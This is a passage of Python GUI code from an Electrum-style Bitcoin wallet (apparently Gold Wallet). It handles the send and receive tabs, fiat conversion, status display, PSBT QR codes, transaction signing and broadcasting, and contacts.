def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({number} blocks)").format(number=server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
balance = self.wallet.get_balance()
c, u, x = balance[:3]
ai, ao = None, None
if len(balance) == 5:
ai, ao = balance[3:]
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s "%(self.format_amount(u, is_diff=True).strip()) + _("unconfirmed") + "]"
if x:
text += " [%s "%(self.format_amount(x, is_diff=True).strip()) + _("unmatured") + "]"
if ai:
text += " [%s "%(self.format_amount(ai, is_diff=True).strip()) + _("Secure incoming") + "]"
if ao:
text += " [%s "%(self.format_amount(ao, is_diff=True).strip()) + _("Secure outgoing") + "]"
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, *, invoice=None, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, invoice=invoice, desc=tx_desc)
def show_psbt_qrcode(self, psbt: PartialTransaction, invoice=None):
def minimize_psbt(psbt):
psbt.convert_all_utxos_to_witness_utxos()
psbt.remove_xpubs_and_bip32_paths()
def chop_data(data):
max_size = 2000
if len(data) <= max_size:
return [data]
chunks = []
chunks_count = len(data)//max_size + 1
chunk_size = (len(data)//chunks_count) + 1
for c in range(chunks_count):
# chunk_no ; chunk_count ; chunk_data
chunk = str(c + 1) + ';' + str(chunks_count) + ';'
chunk += data[c*chunk_size:(c+1)*chunk_size]
chunks.append(chunk)
return chunks
minimize_psbt(psbt)
data = psbt.serialize()
chunks = chop_data(data)
description = _('In order to confirm the transaction, scan the QR codes \
in the "Authenticators" tab in the Gold Wallet app.')
try:
d = PSBTDialog(chunks, self, invoice, description=description)
d.exec_()
except qrcode.exceptions.DataOverflowError:
self.show_error(_('Failed to display QR code.') + '\n' +
_('Transaction is too large in size.'))
except Exception as e:
self.show_error(_('Failed to display QR code.') + '\n' + repr(e))
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Generate'))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice())
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address = ButtonsTextEdit()
self.receive_address.addCopyButton(self.app)
self.receive_address.setReadOnly(True)
self.receive_address.setFocusPolicy(Qt.ClickFocus)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_address, _("Address"))
self.receive_widgets.addTab(self.receive_qr, _("QR Code"))
self.receive_widgets.addTab(self.receive_address_e, "BIP21 URI")
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_("{title} copied to clipboard:\n\n{content}").format(title=title, content=content))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_address.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.receive_address.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
self.receive_address.setText(addr)
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
self.max_button.setChecked(True)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
tx = make_tx(None)
amount = tx.output_value()#sum(x.value_sats() for x in self.get_coins())
self.amount_e.setAmount(amount)
## substract extra fee
#__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
#amount_after_all_fees = amount - x_fee_amount
#self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{alias}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias=alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key, status):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices, external_keypairs=None):
outputs = []
for invoice in invoices:
outputs += invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs, external_keypairs=external_keypairs)
def do_pay_invoice(self, invoice, external_keypairs=None):
if invoice['type'] == PR_TYPE_ONCHAIN:
outputs = invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs, invoice=invoice, external_keypairs=external_keypairs)
else:
raise Exception('unknown invoice type')
def get_coins(self, nonlocal_only=False):
coins = self.get_manually_selected_coins()
return coins or self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Sequence[PartialTxInput]:
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs, outputs, invoice=None, external_keypairs=None):
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = False # Was bool(external_keypairs). Should be good to keep it false, since we do not use trustedcoin
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx, outputs, external_keypairs=external_keypairs, invoice=invoice)
return
output_values = [x.value for x in outputs]
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(self, make_tx, output_value, is_sweep)
d.update_tx()
if d.not_enough_funds:
self.show_message(_('Not Enough Funds'))
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx, invoice=invoice)
self.sign_tx_with_password(tx, sign_done, password, external_keypairs)
else:
self.preview_tx_dialog(make_tx, outputs, external_keypairs=external_keypairs, invoice=invoice)
def preview_tx_dialog(self, make_tx, outputs, external_keypairs=None, invoice=None):
d = PreviewTxDialog(make_tx, outputs, external_keypairs, window=self, invoice=invoice)
d.show()
def broadcast_or_show(self, tx, invoice=None):
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx, invoice=invoice)
elif not tx.is_complete():
self.show_transaction(tx, invoice=invoice)
else:
self.broadcast_transaction(tx, invoice=invoice)
@protected
def sign_tx(self, tx, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback, password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if isinstance(self.wallet, ThreeKeysWallet) and self.wallet.is_instant_mode():
task = partial(self.wallet.sign_instant_transaction, tx, password, external_keypairs)
elif external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction, *, invoice=None, tx_desc=None):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if tx_desc:
self.wallet.set_label(txid, tx_desc)
if invoice:
self.wallet.set_paid(invoice['id'], txid)
self.wallet.set_label(txid, invoice['message'])
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_confirmed(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = partial(self.wallet.lnworker.mktx_for_open_channel, coins, funding_sat)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
# however, the user must not be allowed to broadcast early
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(self, make_tx, funding_sat, False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str, funding_tx, funding_sat, push_amt, password)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {number} confirmations').format(number=n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {error_value}').format(error_value=e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_onchain(self, b):
self.is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {address} from your wallet?").format(address=addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {labels} from your list of contacts?")
.format(labels=" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
